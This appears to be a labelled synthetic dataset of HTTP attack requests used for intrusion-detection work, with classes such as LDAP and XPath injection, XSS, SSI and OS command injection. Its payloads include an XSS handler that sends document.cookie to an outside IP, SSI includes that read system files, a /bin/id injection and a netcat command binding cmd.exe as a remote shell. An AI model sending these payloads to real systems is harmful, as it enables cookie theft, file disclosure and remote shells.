GET /qBztp5pHyIfOY.L/ouiilptnmeeuteGel9d/MNaduheh5ratnuet/TtaaaihNichltfdlnt/53sK71_@UmrQNyX5A/s7BUx/e0rjhe/sTieeh/6idBscriptTPOPaZ8PO/OC5p_EAZ/bm2qswkrefStmaeuv/htm.css?txLh4SAr5grs=%7Etelnet&drairer=o-q%5CyoGorolib&naanehoete4nsaa=p&lneaigysmneh=828&YSvq=Itvwbjzzond&s0eOSSUgjFC=tzc0ne%27+or++++1%3C+++++nsdlz%2Feujti%2Fohgefn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D047%5D+or+++++%27gPnilr%27++++%3D++%27&SBsfc5=iicam&bEus=-uz&Uwnt=n%25aeh%3Brsh&eepiosi=230771&lptaunae833=onas5qz&wiSeehl9eo=30&nrnpnhob3ghntce=78313&l2n=onocouq6v70iiva HTTP/1.1
Host: 113.245.81.43
Connection: close
Accept: text/*;q=0.8, image/*;q=0.8, image/jpeg
Accept-Charset: big5, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=7723
Client-ip: 143.194.93.206
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sun, 02 May 04 01:39:00 UTC
ETag: W/"q2@mOjBBnZF6EGkRzYy_"
Expect: ntitjeo
From: ietdnl@1aln.fr
If-Modified-Since: Fri, 27 Apr 07 16:30:38 GMT
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "2VzXCwtDhMwVchTT4O"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: /IArw0rd/m6yAr.asp
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 5.6; se-Cr; rv:5.3.1) Gecko/09432211
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 238.131.71.180
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48952
Start - Id: 37182
class: LdapInjection
GET /tup-nPGEB0Hn@3uwr/u3optlike/MrT/048eii4mvtborrcDwpsa/m2h/r6/SKdaLXHBP3/xcxLz7j/koFAZ/l7WNQyVbRuc4.shtml?sl=geaccept&6ssilrtazeih6=e&74=%29%28++++%7C%28displayName%3Dhad*%29%28name+%3D+++had*+++%29%28+++mail%3Dhad*++%29&tsmnaehiyeeeh=97029 HTTP/1.1
Host: www.5rode5.cz
Connection: close
Accept: video/*;q=0.4
Accept-Charset: iso-2022-jp, x-mac-chinesetrad;q=0.8, iso-2022-jp;q=0.4, big5;q=0.0, gb2312;q=0.0
Accept-Encoding: gzip;q=0.9, gzip;q=0.1, compress;q=0.8, deflate;q=0.6, compress;q=0.0
Accept-Language: *
Cache-Control: tei='yalemae'
Client-ip: 234.176.71.122
Cookie2: $Version="2"
Date: Sun, 27 Sep 09 20:25:46 UTC
If-Unmodified-Since: Sun, 14 Mar 10 17:17:51 UTC
If-Match: *
If-None-Match: "AnZ8sswG.TSdR8H"
If-Range: Wed, 28 Jan 04 11:56:07 GMT
Max-Forwards: 9706
Authorization: iai0nd 4nyszpea=dnbr
Referer: http://ttsItebe.cz/neis2el/1eosts/etwci.mp3
TE: chunked,gzip
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 6.7; lp-hu; rv:3.6.9) Gecko/03293399
Via: FTP/2.1 www.bezcie.gif
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37182
Start - Id: 49144
class: XPathInjection
GET /yLpKO80oAxhbp2c8plP/08aJZebMRh/mkyn4cQGVhPWvZT/tiYr9zt/xD1FKJscriptlQy9VMU/iIlSl/pTR/Smese/fnhEnnus/il52pcnes/gpnleliaNrundqo.mspx?dhgortasueNa=+remt&-jcatYkMP7=llibuhtn37e2&i67ritr9j66=nnron&h4eeuernnRThef=neeca&OSansrzebcles=27803276&hu9=tkE%27++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i+%2B+++j+++%2B++k+++%2B++l+++%2B++1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27ladRn%27++++%3D%27++ndkes%27+++++or&soagzAh2rande=rNdYe14erir&6V2VL=7603&Fn7eaSmiiiM=a%3E%3F2n&lcAcpsa7T0eI=docopyssmou1&HoQDFo.5E=7529&ossee=aa2an HTTP/1.0
Host: 255.116.227.121
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity, deflate;q=0.5, identity, compress, identity
Accept-Language: iuwttr-7t8;q=0.8, tetShh-Ut;q=0.7, tE41gv-svrmtnn;q=0.9
Cache-Control: max-stale
Client-ip: 97.222.173.73
Cookie: etgoog6ei=ibliz0dTwn;hlhnNtsxhegyr=tLPnpQmYw;y8ie=eJwbwhhoec;rts=d9ISbHG7uM
Cookie2: $Version="36"
Date: Sun, 19 Oct 08 01:16:26 GMT
ETag: W/"qN.EjTkHJgw4cXL"
Expect: cnapd=5nhiuzm;etnii
From: hstr@4dfys6.de
If-Modified-Since: Mon, 05 Oct 09 18:38:01 GMT
If-Unmodified-Since: Sat, 23 Jun 07 18:51:22 GMT
If-Match: "nX46VXb7gchBvw4ch"
If-None-Match: *
If-Range: "U5y@89rpL8rNX3l"
Max-Forwards: 7
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 4916-
Referer: http://www.eSnlnst.be/aeeu/boebrar.png
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.2 (X11; U; Open BSD i586 5.9; ew-sL; rv:0.3.4) Gecko/14893383
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7758x5013
Via: 6.0 www.ha2sor.jpg, 0.7 www.zrjzjr.tiff
Transfer-Encoding: sois
Upgrade: 47A/5.4, wbEbrs/6.2
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49144
Start - Id: 37283
class: LdapInjection
POST /AaReeUucliwisksj/eR9sTsxp.KwhVtJi/NT8HPZdFiPb38X/3j/mgr/oIbdsjoor4le89vlc.nsf? HTTP/1.1
Content-Length: 260
Content-Language: 2
Content-Encoding: identity
Content-Location: http://rGtrOe.org/bnh85/s8hytw/eyie/i2oea6e.mdb
Content-MD5: N0VnaEttZWJlaW90YW5pcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Mar 07 20:52:30 UTC
Last-Modified: Sun, 01 Jul 07 22:21:54 CET
Host: www.mFac6.gov
Connection: szs7o3
Accept: */*
Accept-Charset: x-mac-arabic;q=0.0, windows-1257
Accept-Encoding: deflate;q=0.2
Accept-Language: xn5O)( | (Ebso=*)
Cache-Control: max-age=858
Client-ip: 79.167.217.81
Cookie: sSginvar=8356;PizjL=mfbh80lt5rm&ym
Cookie2: $Version="4"
Date: Tue, 03 Mar 09 05:03:26 CET
ETag: "habrGbVuBjGHw0VnXPVY"
Expect: 100-continue
From: uAoeEcF@bauipcb2x.fr
If-Modified-Since: Wed, 12 Nov 08 07:03:11 CET
If-Unmodified-Since: Wed, 19 Dec 07 16:44:27 CET
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: "4jbDnZOHPA3X_Nem0"
If-Range: "12HowyGn7x5XRv_Y"
Max-Forwards: 274
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: h0o5 os2gn=erur0
Authorization: ynena 0tnenx=aDeh
Referer: http://e23ti.ch/eZfnSnes/h5ecoe/s2nj/tyemot.js
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.7 (compatible; itvonYsgs; Linux i586; aiertheMar; pe1iye)
UA-Disp: 2933,1211,32
UA-OS: Win98
Via: 3.2 50.250.113.169, 3.0 10.74.206.105
Transfer-Encoding: gzip
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 62383698375
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EfaeetCvte5d=6720&edE5cunpaeyT=d1allp~x &rs3s1ib=hie3t(tgeekNf&IRRqkprq=o00WwS&endthchFe=execos&a4ncselect=exU0s&ssatxnieaazreor=j7ti&zs5tmb6hrntnuh=2251&bsxe=is5DBo6&depi=136837&lnewns4Oil=59281610&httde=uuobject$e&hEo=p&qvdeiE=@2mwtgi&uuehichece=5490

End - Id: 37283
Start - Id: 38777
class: LdapInjection
GET /aew1rerhn/hiZYNA2YFtD1CFW.iP/heieiisNa8aiqhs7dO/tmpBmYYiphpyXj/tXBdKd1.png?ew=Mh+i&uaet3peoiiseen=Hcyetmv5FSL&eo9sqRsnawPH7sf=dinwz&weac9=013486&aea=78&oij-e=rl%29%28+%7C+%28rtizh%3D*%29&e9=eDemr&tn5fhF2dmosGRii=44&edoEkbtoa=tei%3C&N.Fh5NAx1EU=63136931&Lan9l=vr2o9Ftgi HTTP/1.1
Host: 197.175.157.245
Connection: honWmeed
Accept: */*
Accept-Charset: hz-gb-2312;q=0.8, iso-2022-jp;q=0.7, x-mac-japanese;q=0.3, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 103.114.5.31
Cookie: Doesn1o1in8its=l3 riox;qlogj@Z3J=ietechoTa
Cookie2: $Version="55"
Date: Thu, 11 Mar 04 01:56:52 UTC
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sat, 06 Jan 07 06:08:51 UTC
If-Unmodified-Since: Wed, 08 Jul 09 16:12:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 6.0
Pragma: veRgcs='nR'
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: NTLM TmFmd3RlcnpucHh4dWllY2FjZXQ1QW1pdXRmMnNveHZkaXRlYWh0OG5va25hbw==
Range: 7-
Referer: http://www.aotst.fr/jttz/nnalvln/tezSi8r4.dll
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/6.6 (X11; U; Unix 2.0; do-HA; rv:0.5.5) Gecko/93007949
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 917x4945
Via: 7.4 42.10.22.200, 4.7 www.oiommmts.htm, 3.9 www.n0ds9hpt.jpg
Transfer-Encoding: deflate
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38777
Start - Id: 47103
class: XSS
GET /ibt2satdns8a/ubkMkac_TtO/hlbQWJED/sHKRDpd60Q36kA/VJqjselect63F@S/aoeeaeOatdEto/lsajdg2Natea25E3.css?Mwh007t_=em%3D%27mnoeuc&igjrS=logbscripte%7E0dons%3E&sock_streamIBh=2hwtnayfOt&rtfus0=tetnizinsieHRx&rsinehAxen0eqe=6bwo&rebia7dn=%3Cdiv++onmouseover+++%3D%22+++++%5Bwindow.open%28%27http%3A%2F%2F109.80.56.173%2Fietill.bin%27%2Bdocument.cookie%29%3B%5D++++%22%3E&5aeeheh=akdann&tj=uh4&ni=Twn%7CtaoRs1&ranmtsN3ye3hwh=%2BOr&oevh=lei3v&aes=bandontuenIenodedtmp HTTP/1.1
Host: 57.82.12.226
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip;q=0.5, compress, identity;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: z8h-90G3WE=sAea7;omn=xubrperl17>8
Cookie2: $Version="1"
Date: Wed, 05 May 10 06:08:28 CET
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: SuneNo=naithni;emlsz
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Thu, 13 Jan 05 23:29:20 CET
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: "Vgdv77E8Qywy77kX5A9"
If-None-Match: "CUW22@T1H2IFmr9n6g"
If-Range: Fri, 28 Nov 08 14:11:57 UTC
Max-Forwards: 69
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: http://www.dnkhvene.net/rmah/dezdh/irjtlhj.pdf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: ilC8neK7 http://www.drmo8.fr
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 320x898
Via: FTP/4.5 www.hhacseim.css
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 236782108
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47103
Start - Id: 48406
class: XPathInjection
GET /teEi/5obE2ospthtihteuseki/HoEnGZ/CmochaxLyobinjoKYr8V/kofxb3tesaIe6otp/Paeirccaoecast1req/bpwn/t@ZYgoK-/lvHDTR1QP-oJyBYc_VCv/nrK/ba6eih/dNohwnsOdoassr.jpeg?g7arauHr9eaponn=otdh&eriy=766&7dtfexaaeoi5t2Z=v&DesoaAzt=0&3u7=7117&z4y=eefrOul+t0trr&ce9ianyeiend=rioiaistf%2FhiOf&apu=3&bnrnserd=5755&Ln02=jeAtsanN&d2KtVG_nk1=dGntu+W0Rlu%2Ba%27%5B&sedeescleein42=4296547&Eeel=%2B&FTTm@O=qet&7Yu=127438 HTTP/1.0
Host: www.utdetiMubs.st:81
Connection: znAeenA
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.2, iso-8859-6;q=0.0, gb2312;q=0.7, iso-8859-9;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 235.162.168.113
Cookie: iceyieerxJ=eh4lSAgujnelwregqt;wheremwJ8LSdocumentgwv=rdcfteI'   or    path/child::node()[position()=N]   or  'wkDe' =  ';synImynehHwsz=383
Cookie2: $Version="471"
Date: Mon, 18 Sep 06 07:01:11 UTC
ETag: "Mad8Zry9bVgwpyzplUX"
Expect: Srhdi=htbohc
From: leYi@sarsGQ.cz
If-Modified-Since: Thu, 13 May 04 01:46:34 UTC
If-Unmodified-Since: Wed, 18 Jan 06 12:33:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="rl5Gq"
Range: 830772-,-737648,2731-224844
Referer: http://www.iis7w8ae.be/oroi/eonpbro/aeeot4/fpAaeq/sshadt.php3
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 6.7; tn-ie; rv:9.1.8) Gecko/29651893
UA-CPU: x86
UA-Pixels: 2595x585
Via: 9.5 202.214.166.163, 6.4 42.117.228.127
Transfer-Encoding: deflate
Warning: 613 94.144.29.207 "amddibhttlecssaf" 
X-Forwarded-For: 152.108.49.185
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48406
Start - Id: 48644
class: XPathInjection
PUT /mQR2FT0u7/tOQVbE6ATUMf6IBf5/4DrZ5ZqCF/ylX73dqG9K/meEf1i/ScByuwSWselectnVCr.mdb? HTTP/1.1
Content-Length: 208
Content-Language: tys6yr
Content-Encoding: identity
Content-Location: /asndtC/hst3d/ltwot.dll
Content-MD5: c2w1NDlvYWFpdXJybXRvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Sat, 26 Apr 08 15:17:01 GMT
Host: 67.194.150.9
Connection: close
Accept: audio/x-wav, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: zttei-9l7duiwi, a-hnrvv;q=0.8, 2wHti-W;q=0.6, acr-ve;q=0.3, 1sLLl-3b;q=0.4
Cache-Control: only-if-cached
Client-ip: 41.88.127.250
Cookie: jPe22=irPtdtruE;ay_PqDWselectIf=AE<9ibcnrgt ;9UAlT=902723175;p4ebe=tq;r7noop=0740;rUs.1CfN=fisSrn?hosno7din 
Cookie2: $Version="353"
Date: Tue, 02 Jan 07 17:35:27 CET
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 31 Dec 06 23:38:06 UTC
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: http://njetooq.org/tgi2n3a/atoidrm.mdb
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: neicIeol/8.3.2.5.5
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: 1.2 www.shee1de.js:27, cbcog/8.1 www.bEleb.png, 2.6 www.uuodo.shtml
Transfer-Encoding: compress
Upgrade: 4iiutb/0.5, Iima/4.6, uhhmar/1.8, nmohS/4.1, tm3A/2.3
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iogtae=objectcoEh&owo=989  or  count(path/child::node()[position()=((i+j+k+l+1)]   |  path/child::*()[position()=(k+1)])=1     or   96544=

End - Id: 48644
Start - Id: 39022
class: LdapInjection
PUT /tko8oKrXAU--7vxm.php? HTTP/1.1
Content-Length: 228
Content-Language: gohncEeW,2dipt8,at
Content-Encoding: identity
Content-Location: http://www.7tbfhe.com/f9mhta/wiyD/rainp/txaa/yxeIfmd.mspx
Content-MD5: YTI2bnVvaWZJY2FocXB1bQ==
Content-Type: application/x-www-form-urlencoded
Host: 33.97.180.195
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ltcs-ranuni, rsr-ihne;q=0.7, lwsr-ix7t
Cache-Control: max-age=5
Cookie: 2shhnfdhcE=tstokt
Cookie2: $Version="735"
Date: Wed, 23 Jun 04 12:01:57 UTC
Expect: iohean
If-Modified-Since: Thu, 03 Jun 04 16:38:39 GMT
If-Range: Thu, 07 Jul 05 02:18:58 CET
Max-Forwards: 228
Referer: /1nvzdd/aItoe/s8uuo/glthh.tar.gz
TE: gzip;q=0.6,deflate,trailers
User-Agent: ")(targetfilter=(o=NetscapeRoot))
UA-Pixels: 5841x328
Via: HTTP/7.8 21.117.55.190, 7.8 237.44.250.70, HTTP/9.7 www.Bbntogh.css:11
Transfer-Encoding: compress
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
X-Forwarded-For: 19.167.50.215
~~~~~: ~~~~~~~~~~~~~~

GEdF=21372880&awel7ul=mahaving&eodm1ak=Hsex2&2zautoexecacceptMm_=lnnier f8tdmnyg&xXC7LX9plikeEsamM=Ai6aed&hmotuwi=0&A569hfc=ttaSG6y6t.&aeta=0dertioelRYia&rTu7smsrpsano1e=8sea&eSmagm=w5rhwti55uaip5p&dep9hdhtaunl=99755&thc13na=swp

End - Id: 39022
Start - Id: 40871
class: SSI
GET /n4wMfAsODxF0.A6prC/fVQksRtPSdH/eveIthoot47jinnttim/At1ieomhsied/on6coonhonlOx8teoera/3U7/xpC06fhrg/ed.1s6LIqGNDoW/oqGYP4Z9f1qW/aaita/sxaquiZx.jsp?hee=%3C%21--+++%23odbc+statement+%3D+%22select++as%2C++++hn%2C+++++taiq+++++from+CmefeTdce++++order++++by+1%2C+35%2C+7%22++--%3E&f4pEioo=tJdKN13&wm4sA=6720 HTTP/1.0
Host: 124.204.68.140
Connection: close
Accept: image/*;q=0.2
Accept-Charset: iso-8859-5, x-mac-chinesetrad;q=0.4, euc-kr, x-mac-hebrew;q=0.7
Accept-Encoding: deflate;q=0.8
Accept-Language: er-tc082soo;q=0.5
Cache-Control: max-age=47
Client-ip: 13.72.58.206
Cookie: eouXquttegai=aeoO;aQaiexu=6110;i6ruj7eocIhn=otmpw0eaT;l2jotu=219109
Cookie2: $Version="63"
Date: Sun, 17 Dec 06 14:23:26 UTC
ETag: "KbUataLGPHm7kibu58"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Mon, 12 Oct 09 07:16:34 CET
If-Unmodified-Since: Wed, 28 Nov 07 11:07:44 CET
If-Match: "y.MCb0tFvUosqjCd"
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: Wed, 08 Dec 04 22:41:25 GMT
Max-Forwards: 94
MIME-Version: 8.5
Pragma: dDRezfn='Ogd'
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: /gmhiruj.php
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Arhd7c (tgzFfz; uITmFZNCn; 6kYiNm)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.8 www.vietfyP.html, HTTP/1.6 www.Itn1role.png
Transfer-Encoding: gzip
Upgrade: etis/5.5, ane/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40871
Start - Id: 36822
class: OsCommanding
GET /dW-nM9dyVhxdYopv4q/elrbfAnptvsaqzlnleja/n_WlBcW./7lhdhiq/vZi6uJAbiframe3yk/1Jq_J_KtzQ7Mu/7kb36bJgTdh/eaoDSb6olGfgXGy/1UflQ_/kdkw2Zt_nP@Ysb/rN.shtml?iethi=odfai&svWl=4646983&RQfkNQ0wXHE=vhhtgtez&ne=ogryZnne9omxChoEds&6ob=i+r&ck1Mheh=%5C%3B+++%5C%2Fbin%5C%2Fid+%3B&EgufAHdKpv=ktpEE6auslser&tst=si8awmerf&ltaxrc=eHd.ygjr6&bsuoWtiydeaI=64&NtesfaareqesaKe=nYxYf3X&rf=nliz-so%29e8e%3B&nstSmwp-TwMEjm=378&dtnftprE30lP=jCx&nI87rRagaA=d%3Eiudeewgetp1 HTTP/1.1
Host: 7.147.186.128
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ded-eihekt;q=0.9, 7-A;q=0.7, fao-svf;q=0.1
Cache-Control: only-if-cached
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="33"
Date: Tue, 17 Feb 09 04:23:48 GMT
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Sat, 11 Aug 07 21:01:20 GMT
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: *
If-Range: Sat, 01 Jul 06 12:10:19 CET
Max-Forwards: 7
MIME-Version: 4.5
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: http://www.asbtr7l.it/arIrpn/esbt0f/eegoeeEe/mevs/iDoao.msf
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 1.4; e7-3g; rv:0.7.5) Gecko/98052565
UA-CPU: 68000
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.6 www.pthaf.png
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36822
Start - Id: 40521
class: SSI
GET /jmieeqocwth/rlndNnhSie/oFLW9p.p.SDlVp./gnh/QuQtUvx/amhlmhNt/NA6dinsertservices/qupuvWe0vjttBV5/5WrA5tEMVzaHJb/wNyB3XM8A@DN/zM2wjocJNk9jS/t3l4Eleew2iyhe60enrs.exe?iF2LrUA=60101072&ycuahnpefn=igbvkOD%40uEWZ&epaoeAdo=058112709&a7o1a5adminow=%3C%21--+++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&i14t9ewe3x=sa4faaccess_logf1aoa3welAHei&net=nY4fYw&t8amnjlPina=locationoa&a47nNceM3iscrm=30GHnUbH&oig=0249&V_JrcpRRrcD99t=+y HTTP/1.0
Host: www.Oede7nsyhw.be
Connection: nrtaftE
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-1;q=0.7, macintosh;q=0.9, iso-8859-6, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: iunepr-a;q=0.9
Cache-Control: no-cache
Client-ip: 104.129.82.29
Cookie: adusc=75263;4rurao=tNhtieg;5@.OeHv=tshpb;QiFKKSreplacedD=)
Cookie2: $Version="7"
Date: Sun, 05 Apr 09 12:50:28 GMT
ETag: "Yft_HrePKZX4dLYlSUA"
Expect: besfPn3f
From: saz62@4ozorobWl.com
If-Modified-Since: Sat, 04 Nov 06 15:33:36 GMT
If-Unmodified-Since: Tue, 24 Jan 06 07:41:31 CET
If-Match: *
If-None-Match: "5XAgYq1LduxiU44630"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.6
Pragma: s='ioee'
Proxy-Authorization: dler dcyii=syes
Authorization: Basic aGhhMTplaHpo
Range: 519-,1526-,-4
Referer: http://dhetns.com/ramhwk/sire3e/Haga.asp
TE: trailers,gzip,trailers
Trailer: If-Modified-Since
User-Agent: jcryqN9trz
UA-CPU: MIPS
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.2 5.202.141.14
Transfer-Encoding: gzip
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 54980742436661257
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40521
Start - Id: 42844
class: OsCommanding
GET /d3aZJ2jqIJgngg7Ce2d/osnoaeeecou/aoes/1fHzBmPV/zmeuW6amJK/szKfa/WshH2KJaccess_logj4/n162hldEircTneuenwu.swf?nG7TidrnHe2t=lEixa573aI1cPm&ooctThnhsh9lwoe=%40fveftwr&6rdhanm=md90ddeleteferno&2EFMJiLj7HWn=1uearcn%3Eo&Stsac=%7C++shell%28+%22cmd++%2Fc++c%3AInetpubwwwrootMSISSnc.exe++-l++++-p++0464++-t+-e+++++cmd.exe+++%22+++++%29+%7C+++%27&aTi1goehlsesd=36845&wn7ft=j%3EnsNsue+cm%25twrt+&a3nt3atjbnsvsh=06&Aihtelzdtr=s1qexeceOysqausozf&apTuernULsu=%2Brtwh&ht=41932&i7w=ob&Rzitskoe7f4=74&sLatr5E=epyiaexect%24a HTTP/1.1
Host: www.uade.be:80
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, ks_c_5601-1987;q=0.9, iso-8859-3, koi8;q=0.4, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: oF3f-akdtd, ytt-hv;q=0.4
Cache-Control: only-if-cached
Client-ip: 76.60.42.31
Cookie: O6MZ=y9zz7YLVAP;odcs6ct=537878;r1f=1021522
Cookie2: $Version="71"
Date: Sat, 08 Aug 09 19:25:38 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: tceM
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 15 Jun 06 17:11:54 UTC
If-Unmodified-Since: Thu, 26 Feb 04 22:06:48 UTC
If-Match: *
If-None-Match: "77JtLIflAVhkyK5b"
